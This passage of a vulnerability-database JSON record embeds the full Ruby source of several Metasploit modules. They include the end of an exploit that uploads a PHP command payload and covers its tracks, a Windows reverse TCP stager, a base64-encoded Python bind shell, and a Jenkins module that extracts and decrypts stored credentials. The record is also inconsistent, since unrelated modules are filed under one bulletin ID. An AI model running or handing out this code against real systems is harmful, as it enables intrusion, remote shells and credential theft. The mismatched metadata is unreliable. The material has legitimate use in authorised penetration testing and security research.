hash,\n }, 25)\n\n if (res)\n print_good(\"Successfully reset original password hash.\")\n else\n print_error(\"Error resetting original password!\")\n end\n end\n\n def delete_file(file)\n\n delete_path = \"/comment_delete_cgi.php?y=05&m=08&comment=.#{file}\"\n\n res = send_request_raw({\n 'uri'\t=> normalize_uri(datastore['URI'], delete_path),\n }, 25)\n\n if (res)\n print_good(\"Successfully removed #{file}\")\n else\n print_error(\"Error removing #{file}!\")\n end\n end\n\n def cmd_shell(cmdpath)\n print_status(\"Calling payload: #{cmdpath}\")\n\n res = send_request_raw({\n 'uri'\t=> datastore['URI'] + cmdpath\n }, 25)\n\n end\n\n def exploit\n\n # Define the scripts to be uploaded to aid in exploitation\n cmd_php = '<?php ' + payload.encoded + '?>'\n\n reset_php = %Q|\n <?php $hash = $_POST['hash'];\n $fp = fopen(\"../config/password.txt\",\"w\");\n fwrite($fp,$hash);\n fpclose($fp);\n ?>|\n\n # Generate some random strings\n cmdscript\t= rand_text_alphanumeric(20) + '.php'\n resetscript\t= rand_text_alphanumeric(20) + '.php'\n newuser \t= rand_text_alphanumeric(6)\n newpass \t= rand_text_alphanumeric(6)\n\n # Static files\n directory \t= '/images/'\n cmdpath \t= directory + cmdscript\n resetpath \t= directory + resetscript\n passwdfile \t= '/config/password.txt'\n\n # Let's do this thing\n hash = retrieve_password_hash(passwdfile)\n delete_file(passwdfile)\n create_new_password(newuser, newpass)\n session = retrieve_session(newuser, newpass)\n upload_page(session, directory, resetscript, reset_php)\n upload_page(session, directory, cmdscript, cmd_php)\n reset_original_password(hash, resetpath)\n delete_file(resetpath)\n cmd_shell(cmdpath)\n delete_file(cmdpath)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-27T10:42:29", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 8}, {"bulletin": {"id": 
"MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-27T13:07:09", "history": [], "viewCount": 12, "enchantments": {"score": {"value": -0.6, "vector": "NONE", "modified": "2019-06-27T13:07:09"}, "dependencies": {"references": [{"type": "talosblog", "idList": ["TALOSBLOG:DB224D758C82529E1585E5EF1DB1FDB1"]}, {"type": "thn", "idList": ["THN:D6117E821CC35301CBF666F41C14AC0E", "THN:FBAD9A20903607562F942FCDD6D93183"]}, {"type": "hackread", "idList": ["HACKREAD:D224FE188FB518B4BC3EABF51C58D965"]}, {"type": "threatpost", "idList": ["THREATPOST:72236319BAB4F01C9BE8DD2459ED5F94"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310107027", "OPENVAS:1361412562310142507", "OPENVAS:1361412562310142509"]}, {"type": "zdt", "idList": ["1337DAY-ID-32902", "1337DAY-ID-32903", "1337DAY-ID-32910", "1337DAY-ID-32898", "1337DAY-ID-32907", "1337DAY-ID-32909"]}, {"type": "mssecure", "idList": ["MSSECURE:CDA73C194141860C4C4FE0E32FB8E2B7"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:E21433CF86603167D28FD5F315ECFFA9"]}, {"type": "krebs", "idList": ["KREBS:07C73B5E86596D99F557E157FDD0843E"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:16836CACCD5C61030C97BFF27CA03E24"]}, {"type": "kitploit", "idList": ["KITPLOIT:918962306885733667"]}, {"type": "securelist", "idList": ["SECURELIST:B8D488526216D8E2E4D0711DA61A5D8E"]}], "modified": "2019-06-27T13:07:09"}}, "objectVersion": "1.4", "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-27T13:07:09", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 9}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "fa1a2bf94beb5720923c4675535d92b4", "type": "metasploit", "bulletinFamily": "exploit", "title": "Joomla Page Scanner", "description": "This module scans a Joomla install for common pages.\n", "published": "2013-01-25T19:44:49", "modified": "2018-07-31T16:37:10", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-11T16:33:28", "history": [], "viewCount": 12, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2019-07-11T16:33:28"}, "dependencies": {"references": [{"type": "carbonblack", "idList": ["CARBONBLACK:3B22154441E43549CCD59FB21769BA36", 
"CARBONBLACK:CD92595A18896CE7F1792E03F66EC493"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:E59EB8E9EC20422785AE9DAFC61E8EFB", "QUALYSBLOG:5AF9221F26800CBB100A5B0C047EF78A"]}, {"type": "exploitdb", "idList": ["EDB-ID:47105", "EDB-ID:47100", "EDB-ID:47091", "EDB-ID:47095", "EDB-ID:47093", "EDB-ID:47099"]}, {"type": "kitploit", "idList": ["KITPLOIT:5782004382058810681"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310814989", "OPENVAS:1361412562310814984", "OPENVAS:1361412562310815516", "OPENVAS:1361412562310815501", "OPENVAS:1361412562310815514", "OPENVAS:1361412562310815232", "OPENVAS:1361412562310815153", "OPENVAS:1361412562310815504", "OPENVAS:1361412562310815152"]}], "modified": "2019-07-11T16:33:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/joomla_pages.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. 
Finally thanks to\n # Joomscan and various MSF modules for code examples.\n def initialize\n super(\n 'Name' => 'Joomla Page Scanner',\n 'Description' => %q{\n This module scans a Joomla install for common pages.\n },\n 'Author' => [ 'newpid0' ],\n 'License' => MSF_LICENSE\n )\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"The path to the Joomla install\", '/'])\n ])\n end\n\n def run_host(ip)\n tpath = normalize_uri(target_uri.path)\n if tpath[-1,1] != '/'\n tpath += '/'\n end\n\n pages = [\n 'robots.txt',\n 'administrator/index.php',\n 'admin/',\n 'index.php/using-joomla/extensions/components/users-component/registration-form',\n 'index.php/component/users/?view=registration',\n 'htaccess.txt'\n ]\n\n vprint_status(\"Checking for interesting pages\")\n pages.each do |page|\n scan_pages(tpath, page, ip)\n end\n\n end\n\n def scan_pages(tpath, page, ip)\n res = send_request_cgi({\n 'uri' => \"#{tpath}#{page}\",\n 'method' => 'GET',\n })\n return if not res or not res.body or not res.code\n res.body.gsub!(/[\\r|\\n]/, ' ')\n\n if (res.code == 200)\n note = \"Page Found\"\n if (res.body =~ /Administration Login/ and res.body =~ /\\(\\'form-login\\'\\)\\.submit/ or res.body =~/administration console/)\n note = \"Administrator Login Page\"\n elsif (res.body =~/Registration/ and res.body =~/class=\"validate\">Register<\\/button>/)\n note = \"Registration Page\"\n end\n\n msg = \"#{note}: #{tpath}#{page}\"\n print_good(\"#{peer} - #{msg}\")\n\n report_note(\n :host => ip,\n :port => rport,\n :proto => 'tcp',\n :sname => 'http',\n :ntype => 'joomla_page',\n :data => msg,\n :update => :unique_data\n )\n elsif (res.code == 403)\n if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)\n vprint_status(\"#{peer} - denied access to #{ip} (SSL Required)\")\n elsif (res.body =~ /has a list of IP addresses that are not allowed/)\n vprint_status(\"#{peer} - restricted access by 
IP\")\n elsif (res.body =~ /SSL client certificate is required/)\n vprint_status(\"#{peer} - requires a SSL client certificate\")\n else\n vprint_status(\"#{peer} - ip access to #{ip} #{res.code} #{res.message}\")\n end\n end\n\n return\n\n rescue OpenSSL::SSL::SSLError\n vprint_error(\"SSL error\")\n return\n rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError\n vprint_error(\"Unable to Connect\")\n return\n rescue ::Timeout::Error, ::Errno::EPIPE\n vprint_error(\"Timeout error\")\n return\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-11T16:33:28", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 10}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. 
Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-11T18:28:36", "history": [], "viewCount": 12, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2019-07-11T18:28:36"}, "dependencies": {"references": [{"type": "mssecure", "idList": ["MSSECURE:B42A4FB86A509DBE18B901CDF6623FBE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:3B22154441E43549CCD59FB21769BA36", "CARBONBLACK:CD92595A18896CE7F1792E03F66EC493"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:E59EB8E9EC20422785AE9DAFC61E8EFB", "QUALYSBLOG:5AF9221F26800CBB100A5B0C047EF78A"]}, {"type": "talosblog", "idList": ["TALOSBLOG:AB37BD3B89808BC17131C9FD653372A8"]}, {"type": "exploitdb", "idList": ["EDB-ID:47105", "EDB-ID:47099", "EDB-ID:47091", "EDB-ID:47095", "EDB-ID:47100"]}, {"type": "kitploit", "idList": ["KITPLOIT:5782004382058810681"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815232", "OPENVAS:1361412562310815504", "OPENVAS:1361412562310814984", "OPENVAS:1361412562310814989", "OPENVAS:1361412562310815233", "OPENVAS:1361412562310815507", "OPENVAS:1361412562310815516", "OPENVAS:1361412562310815155"]}], "modified": "2019-07-11T18:28:36"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n 
super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-11T18:28:36", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 11}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "0cc32500cfadad1807eaf90b527de9c0", "type": "metasploit", "bulletinFamily": "exploit", "title": "Command Shell, Bind TCP (via python)", "description": "Creates an interactive shell via python, encodes with base64 by design\n", "published": "2017-10-23T14:20:19", "modified": "2017-10-24T04:04:02", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-23T23:00:59", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 2.8, "vector": "NONE", "modified": "2019-07-23T23:00:59"}, "dependencies": {"references": [{"type": "carbonblack", "idList": ["CARBONBLACK:3A2630BDE36D76A2AD8878BA46386B1A", "CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "threatpost", "idList": ["THREATPOST:5049F818B995E5121EDA184A34A957E6", "THREATPOST:225698ED1A5A2058881086D75E7ADE70", "THREATPOST:92607F395C2C7C7A05BCCE4A5547160A"]}, {"type": "msrc", "idList": ["MSRC:906AC0755E9EC24CAF074F7E4CF693E7"]}, {"type": "kitploit", "idList": ["KITPLOIT:6387497839583318095"]}, {"type": "cve", "idList": ["CVE-2019-11989", "CVE-2019-11990", "CVE-2019-7590", "CVE-2019-1167"]}, {"type": "talosblog", "idList": ["TALOSBLOG:BDEC9F3166490EE6F1F4DFE075BDD2D9", "TALOSBLOG:AA5D0E93E7EEBBBB419E1CCF1191A04E"]}, {"type": "thn", 
"idList": ["THN:9C451869D6D82B209A22C2E5F247FEE0"]}, {"type": "exploitdb", "idList": ["EDB-ID:47137"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153697", "PACKETSTORM:153698"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815255", "OPENVAS:1361412562310815253"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0FEB0AF7A8D15834DA7D1882395A9D7C"]}], "modified": "2019-07-23T23:00:59"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/python/shell_bind_tcp.rb", "sourceData": "require 'msf/core/handler/bind_tcp'\nrequire 'msf/core/payload/python'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 381\n\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Command Shell, Bind TCP (via python)',\n 'Description' => 'Creates an interactive shell via python, encodes with base64 by design',\n 'Author' => 'mumbai',\n 'License' => MSF_LICENSE,\n 'Platform' => 'python',\n 'Arch' => ARCH_PYTHON,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'python',\n 'Payload' =>\n {\n 'Offsets' => { },\n 'Payload' => ''\n }\n ))\n end\n\n def generate\n super + command_string\n end\n\n def command_string\n cmd = ''\n dead = Rex::Text.rand_text_alpha(2)\n # Set up the socket\n cmd << \"import socket,os\\n\"\n cmd << \"so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\\n\"\n cmd << \"so.bind(('#{datastore['RHOST']}',#{ datastore['LPORT']}))\\n\"\n cmd << \"so.listen(1)\\n\"\n cmd << \"so,addr=so.accept()\\n\"\n cmd << \"#{dead}=False\\n\"\n cmd << \"while not #{dead}:\\n\"\n cmd << \"\\tdata=so.recv(1024)\\n\"\n cmd << \"\\tstdin,stdout,stderr,=os.popen3(data)\\n\"\n cmd << \"\\tstdout_value=stdout.read()+stderr.read()\\n\"\n cmd << \"\\tso.send(stdout_value)\\n\"\n\n # 
base64\n cmd = \"exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))\"\n cmd\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-23T23:00:59", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 12}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-24T01:21:05", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.3, "vector": "NONE", "modified": "2019-07-24T01:21:05"}, "dependencies": {"references": [{"type": "carbonblack", "idList": ["CARBONBLACK:3A2630BDE36D76A2AD8878BA46386B1A", "CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "threatpost", "idList": ["THREATPOST:5049F818B995E5121EDA184A34A957E6", "THREATPOST:225698ED1A5A2058881086D75E7ADE70", "THREATPOST:92607F395C2C7C7A05BCCE4A5547160A"]}, {"type": "msrc", "idList": ["MSRC:906AC0755E9EC24CAF074F7E4CF693E7"]}, {"type": "kitploit", "idList": ["KITPLOIT:6387497839583318095"]}, {"type": "cve", "idList": ["CVE-2019-11989", "CVE-2019-11990", "CVE-2019-7590", "CVE-2019-1167"]}, {"type": "talosblog", "idList": ["TALOSBLOG:BDEC9F3166490EE6F1F4DFE075BDD2D9", "TALOSBLOG:AA5D0E93E7EEBBBB419E1CCF1191A04E"]}, {"type": "thn", "idList": ["THN:9C451869D6D82B209A22C2E5F247FEE0"]}, {"type": "exploitdb", "idList": ["EDB-ID:47137"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153697", "PACKETSTORM:153698"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815253", 
"OPENVAS:1361412562310815255"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0FEB0AF7A8D15834DA7D1882395A9D7C"]}], "modified": "2019-07-24T01:21:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-24T01:21:05", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 13}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "02c8ac769ae0c3050049db8e0ffdbd7f", "type": "metasploit", "bulletinFamily": "exploit", "title": "Jenkins Domain Credential Recovery", "description": "This module will collect Jenkins domain credentials, and uses the script console to decrypt each password if anonymous permission is allowed. 
It has been tested against Jenkins version 1.590, 1.633, and 1.638.\n", "published": "2015-11-23T22:23:59", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html"], "cvelist": [], "lastseen": "2019-07-25T07:15:03", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.7, "vector": "NONE", "modified": "2019-07-25T07:15:03"}, "dependencies": {"references": [{"type": "pentestit", "idList": ["PENTESTIT:3699C81C5F2D75668446A68245CA8BA5"]}, {"type": "kitploit", "idList": ["KITPLOIT:1521717899068290187", "KITPLOIT:6387497839583318095"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:89070BA9467D02F1834CE0214BB8B605"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:353CB4603C296A43DDDDDAE6CAC6BE25"]}, {"type": "exploitdb", "idList": ["EDB-ID:47152"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995204"]}, {"type": "cve", "idList": ["CVE-2019-2799", "CVE-2019-11694", "CVE-2019-9818", "CVE-2019-11700", "CVE-2019-11702", "CVE-2019-11989", "CVE-2019-11990", "CVE-2019-7590"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:3A2630BDE36D76A2AD8878BA46386B1A", "CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "threatpost", "idList": ["THREATPOST:5049F818B995E5121EDA184A34A957E6", "THREATPOST:225698ED1A5A2058881086D75E7ADE70"]}, {"type": "msrc", "idList": ["MSRC:906AC0755E9EC24CAF074F7E4CF693E7"]}], "modified": "2019-07-25T07:15:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/jenkins_cred_recovery.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'json'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Jenkins Domain 
Credential Recovery',\n 'Description' => %q{\n This module will collect Jenkins domain credentials, and uses\n the script console to decrypt each password if anonymous permission\n is allowed.\n\n It has been tested against Jenkins version 1.590, 1.633, and 1.638.\n },\n 'Author' =>\n [\n 'Th3R3p0', # Vuln Discovery, PoC\n 'sinn3r' # Metasploit\n ],\n 'References' =>\n [\n [ 'EDB', '38664' ],\n [ 'URL', 'http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html' ]\n ],\n 'DefaultOptions' =>\n {\n 'RPORT' => 8080\n },\n 'License' => MSF_LICENSE\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path for Jenkins', '/']),\n OptString.new('JENKINSDOMAIN', [true, 'The domain where we want to extract credentials from', '_'])\n ])\n end\n\n\n # Returns the Jenkins version.\n #\n # @return [String] Jenkins version.\n # @return [NilClass] No Jenkins version found.\n def get_jenkins_version\n uri = normalize_uri(target_uri.path)\n res = send_request_cgi({ 'uri' => uri })\n\n unless res\n fail_with(Failure::Unknown, 'Connection timed out while finding the Jenkins version')\n end\n\n html = res.get_html_document\n version_attribute = html.at('body').attributes['data-version']\n version = version_attribute ? version_attribute.value : ''\n version.scan(/jenkins\\-([\\d\\.]+)/).flatten.first\n end\n\n\n # Returns the Jenkins domain configured by the user.\n #\n # @return [String]\n def domain\n datastore['JENKINSDOMAIN']\n end\n\n\n # Returns a check code indicating the vulnerable status.\n #\n # @return [Array] Check code\n def check\n version = get_jenkins_version\n vprint_status(\"Found version: #{version}\")\n\n # Default version is vulnerable, but can be mitigated by refusing anonymous permission on\n # decryption API. So a version wouldn't be adequate to check.\n if version\n return Exploit::CheckCode::Detected\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n # Returns all the found Jenkins accounts of a specific domain. 
The accounts collected only\n # include the ones with the username-and-password kind. It does not include other kinds such\n # as SSH, certificates, or other plugins.\n #\n # @return [Array<Hash>] An array of account data such as id, username, kind, description, and\n # the domain it belongs to.\n def get_users\n users = []\n\n uri = normalize_uri(target_uri.path, 'credential-store', 'domain', domain)\n uri << '/'\n\n res = send_request_cgi({ 'uri'=>uri })\n\n unless res\n fail_with(Failure::Unknown, 'Connection timed out while enumerating accounts.')\n end\n\n html = res.get_html_document\n rows = html.search('//table[@class=\"sortable pane bigtable\"]//tr')\n\n # The first row is the table header, which we don't want.\n rows.shift\n\n rows.each do |row|\n td = row.search('td')\n id = td[0].at('a').attributes['href'].value.scan(/^credential\\/(.+)/).flatten.first || ''\n name = td[1].text.scan(/^(.+)\\/\\*+/).flatten.first || ''\n kind = td[2].text\n desc = td[3].text\n next unless /Username with password/i === kind\n\n users << {\n id: id,\n username: name,\n kind: kind,\n description: desc,\n domain: domain\n }\n end\n\n users\n end\n\n\n # Returns the found encrypted password from the update page.\n #\n # @param id [String] The ID of a specific account.\n #\n # @return [String] Found encrypted password.\n # @return [NilCass] No encrypted password found.\n def get_encrypted_password(id)\n uri = normalize_uri(target_uri.path, 'credential-store', 'domain', domain, 'credential', id, 'update')\n res = send_request_cgi({ 'uri'=>uri })\n\n unless res\n fail_with(Failure::Unknown, 'Connection timed out while getting the encrypted password')\n end\n\n html = res.get_html_document\n input = html.at('//div[@id=\"main-panel\"]//form//table//tr/td//input[@name=\"_.password\"]')\n\n if input\n return input.attributes['value'].value\n else\n vprint_error(\"Unable to find encrypted password for #{id}\")\n end\n\n nil\n end\n\n\n # Returns the decrypted password by using the 
script console.\n #\n # @param encrypted_pass [String] The encrypted password.\n #\n # @return [String] The decrypted password.\n # @return [NilClass] No decrypted password found (no result found on the console)\n def decrypt(encrypted_pass)\n uri = normalize_uri(target_uri, 'script')\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'vars_post' => {\n 'script' => \"hudson.util.Secret.decrypt '#{encrypted_pass}'\",\n 'json' => {'script' => \"hudson.util.Secret.decrypt '#{encrypted_pass}'\"}.to_json,\n 'Submit' => 'Run'\n }\n })\n\n unless res\n fail_with(Failure::Unknown, 'Connection timed out while accessing the script console')\n end\n\n if /javax\\.servlet\\.ServletException: hudson\\.security\\.AccessDeniedException2/ === res.body\n vprint_error('No permission to decrypt password')\n return nil\n end\n\n html = res.get_html_document\n result = html.at('//div[@id=\"main-panel\"]//pre[contains(text(), \"Result:\")]')\n if result\n decrypted_password = result.inner_text.scan(/^Result: ([[:print:]]+)/).flatten.first\n return decrypted_password\n else\n vprint_error('Unable to find result')\n end\n\n nil\n end\n\n\n # Decrypts an encrypted password for a given ID.\n #\n # @param id [String] Account ID.\n #\n # @return [String] The decrypted password.\n # @return [NilClass] No decrypted password found (no result found on the console)\n def descrypt_password(id)\n encrypted_pass = get_encrypted_password(id)\n decrypt(encrypted_pass)\n end\n\n\n # Reports the username and password to database.\n #\n # @param opts [Hash]\n # @option opts [String] :user\n # @option opts [String] :password\n # @option opts [String] :proof\n #\n # @return [void]\n def report_cred(opts)\n service_data = {\n address: rhost,\n port: rport,\n service_name: ssl ? 
'https' : 'http',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user]\n }.merge(service_data)\n\n if opts[:password]\n credential_data.merge!(\n private_data: opts[:password],\n private_type: :password\n )\n end\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::UNTRIED,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n\n def run\n users = get_users\n print_status(\"Found users for domain #{domain}: #{users.length}\")\n\n users.each do |user_data|\n pass = descrypt_password(user_data[:id])\n if pass\n if user_data[:description].blank?\n print_good(\"Found credential: #{user_data[:username]}:#{pass}\")\n else\n print_good(\"Found credential: #{user_data[:username]}:#{pass} (#{user_data[:description]})\")\n end\n else\n print_status(\"Found #{user_data[:username]}, but unable to decrypt password.\")\n end\n\n report_cred(\n user: user_data[:username],\n password: pass,\n proof: user_data.inspect\n )\n end\n end\n\n\n def print_status(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n\n def print_good(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n\n def print_error(msg='')\n super(\"#{peer} - #{msg}\")\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-25T07:15:03", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 14}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": 